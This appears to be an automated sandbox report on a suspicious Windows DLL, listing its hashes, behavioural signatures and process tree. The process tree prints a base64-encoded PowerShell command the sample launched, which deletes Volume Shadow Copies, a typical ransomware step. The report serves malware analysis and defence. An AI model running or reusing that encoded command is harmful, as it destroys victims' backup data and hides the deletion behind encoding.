Analysis
-
max time kernel
119s -
max time network
132s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
24-01-2022 01:06
Static task
static1
Behavioral task
behavioral1
Sample
c6bbcbd392e5828b0fd1130e4c27cf352415295b0428c6b1ce6707528cfa8502.dll
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
c6bbcbd392e5828b0fd1130e4c27cf352415295b0428c6b1ce6707528cfa8502.dll
Resource
win10-en-20211208
General
-
Target
c6bbcbd392e5828b0fd1130e4c27cf352415295b0428c6b1ce6707528cfa8502.dll
-
Size
116KB
-
MD5
37d43403b20d57d78f8c4c646519d37f
-
SHA1
d8166955e745633324423508cdd4924d5e1af8da
-
SHA256
c6bbcbd392e5828b0fd1130e4c27cf352415295b0428c6b1ce6707528cfa8502
-
SHA512
2ad1ce6da0ec326fcbb6a759ac614b7e7bd6303c42e269c4405a82e5c7a8d8e2d1f6faf146fd7d176638a2c6d9f098236f83460c46252e2235ad88dd3eb45d13
Malware Config
Signatures
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
rundll32.exedescription ioc process File opened (read-only) \??\N: rundll32.exe File opened (read-only) \??\Q: rundll32.exe File opened (read-only) \??\Z: rundll32.exe File opened (read-only) \??\A: rundll32.exe File opened (read-only) \??\H: rundll32.exe File opened (read-only) \??\I: rundll32.exe File opened (read-only) \??\K: rundll32.exe File opened (read-only) \??\L: rundll32.exe File opened (read-only) \??\T: rundll32.exe File opened (read-only) \??\V: rundll32.exe File opened (read-only) \??\W: rundll32.exe File opened (read-only) \??\B: rundll32.exe File opened (read-only) \??\E: rundll32.exe File opened (read-only) \??\J: rundll32.exe File opened (read-only) \??\O: rundll32.exe File opened (read-only) \??\R: rundll32.exe File opened (read-only) \??\X: rundll32.exe File opened (read-only) \??\G: rundll32.exe File opened (read-only) \??\P: rundll32.exe File opened (read-only) \??\U: rundll32.exe File opened (read-only) \??\F: rundll32.exe File opened (read-only) \??\M: rundll32.exe File opened (read-only) \??\S: rundll32.exe File opened (read-only) \??\Y: rundll32.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
rundll32.exepowershell.exepid process 268 rundll32.exe 452 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
rundll32.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 268 rundll32.exe Token: SeDebugPrivilege 452 powershell.exe Token: SeBackupPrivilege 1952 vssvc.exe Token: SeRestorePrivilege 1952 vssvc.exe Token: SeAuditPrivilege 1952 vssvc.exe -
Suspicious use of WriteProcessMemory 11 IoCs
Processes:
rundll32.exerundll32.exedescription pid process target process PID 584 wrote to memory of 268 584 rundll32.exe rundll32.exe PID 584 wrote to memory of 268 584 rundll32.exe rundll32.exe PID 584 wrote to memory of 268 584 rundll32.exe rundll32.exe PID 584 wrote to memory of 268 584 rundll32.exe rundll32.exe PID 584 wrote to memory of 268 584 rundll32.exe rundll32.exe PID 584 wrote to memory of 268 584 rundll32.exe rundll32.exe PID 584 wrote to memory of 268 584 rundll32.exe rundll32.exe PID 268 wrote to memory of 452 268 rundll32.exe powershell.exe PID 268 wrote to memory of 452 268 rundll32.exe powershell.exe PID 268 wrote to memory of 452 268 rundll32.exe powershell.exe PID 268 wrote to memory of 452 268 rundll32.exe powershell.exe
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\c6bbcbd392e5828b0fd1130e4c27cf352415295b0428c6b1ce6707528cfa8502.dll,#11⤵
- Suspicious use of WriteProcessMemory
PID:584 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\c6bbcbd392e5828b0fd1130e4c27cf352415295b0428c6b1ce6707528cfa8502.dll,#12⤵
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:268 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:452
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:1692
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1952
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/268-54-0x0000000076C61000-0x0000000076C63000-memory.dmpFilesize
8KB
-
memory/452-55-0x000007FEFC321000-0x000007FEFC323000-memory.dmpFilesize
8KB
-
memory/452-57-0x0000000002430000-0x0000000002432000-memory.dmpFilesize
8KB
-
memory/452-58-0x0000000002432000-0x0000000002434000-memory.dmpFilesize
8KB
-
memory/452-59-0x0000000002434000-0x0000000002437000-memory.dmpFilesize
12KB
-
memory/452-56-0x000007FEF35B0000-0x000007FEF410D000-memory.dmpFilesize
11.4MB
-
memory/452-60-0x000000001B750000-0x000000001BA4F000-memory.dmpFilesize
3.0MB
-
memory/452-61-0x000000000243B000-0x000000000245A000-memory.dmpFilesize
124KB